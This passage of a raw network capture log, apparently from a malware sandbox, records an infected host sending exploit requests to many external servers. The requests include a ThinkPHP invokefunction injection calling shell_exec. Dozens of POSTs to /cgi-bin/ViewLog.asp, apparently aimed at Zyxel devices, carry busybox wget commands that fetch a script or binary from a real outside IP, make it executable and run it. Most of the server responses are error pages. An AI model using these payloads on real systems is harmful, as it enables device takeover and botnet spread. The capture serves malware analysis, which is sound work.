                                                      Feb 14, 2024 09:30:50.682971954 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:50 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:50 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 64 31 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 34 35 30 26 23 34 36 3b 33 64 32 30 38 66 30 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;1d1a7b5c&#46;1707899450&#46;3d208f07</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      869192.168.2.153649495.101.203.21280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:50.503021002 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:50.706319094 CET479INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 257
                                                      Expires: Wed, 14 Feb 2024 08:30:50 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:50 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 66 30 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 35 30 26 23 34 36 3b 34 63 35 35 31 39 38 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;6f01002&#46;1707899450&#46;4c551987</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      870192.168.2.155435062.84.102.2138080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:50.739670992 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      871192.168.2.156071631.211.147.2518080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:50.971307993 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:51.205796957 CET390INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html
                                                      Server: httpd
                                                      Date: Wed, 14 Feb 2024 08:30:51 GMT
                                                      Connection: close
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Cache-Control: post-check=0, pre-check=0
                                                      Pragma: no-cache
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 43 72 6f 73 73 20 53 69 74 65 20 41 63 74 69 6f 6e 20 64 65 74 65 63 74 65 64 21 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>Cross Site Action detected!</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      872192.168.2.154091294.103.234.708080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:50.980083942 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      873192.168.2.155936494.45.208.1588080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:50.983556032 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      874192.168.2.153695631.200.77.1108080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:50.986861944 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      875192.168.2.153650294.120.31.328080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:50.987322092 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      876192.168.2.155640094.120.225.588080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:50.987504005 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      877192.168.2.156004494.123.110.178080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:50.988776922 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      878192.168.2.156072694.121.213.2038080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:50.989002943 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      879192.168.2.154107862.29.80.1998080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:50.989191055 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      880192.168.2.156073831.211.147.2518080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:51.432976007 CET427INHTTP/1.1 408 Request Timeout
                                                      Content-Type: text/html
                                                      Server: httpd
                                                      Date: Wed, 14 Feb 2024 08:30:51 GMT
                                                      Connection: close
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Cache-Control: post-check=0, pre-check=0
                                                      Pragma: no-cache
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 6f 75 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 6f 75 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 61 70 70 65 61 72 65 64 20 77 69 74 68 69 6e 20 61 20 72 65 61 73 6f 6e 61 62 6c 65 20 74 69 6d 65 20 70 65 72 69 6f 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>408 Request Timeout</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>408 Request Timeout</H4>No request appeared within a reasonable time period.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      881192.168.2.154694894.250.30.1988080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:52.502188921 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      882192.168.2.154015262.202.159.1968080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:52.696875095 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      883192.168.2.153304631.136.140.718080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:52.726061106 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:53.399683952 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:54.743669987 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:57.431718111 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:02.807449102 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:13.559221983 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:36.598519087 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:19.605287075 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      884192.168.2.154670095.106.176.698080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:52.737694979 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:52.978188038 CET480INHTTP/1.1 404 Not Found
                                                      Server: mini_httpd/1.19 19dec2003
                                                      Date: Wed, 14 Feb 2024 08:30:52 GMT
                                                      Cache-Control: no-cache,no-store
                                                      Content-Type: text/html; charset=%s
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.19 19dec2003</A></ADDRESS></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      885192.168.2.155221094.120.37.618080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:52.749761105 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
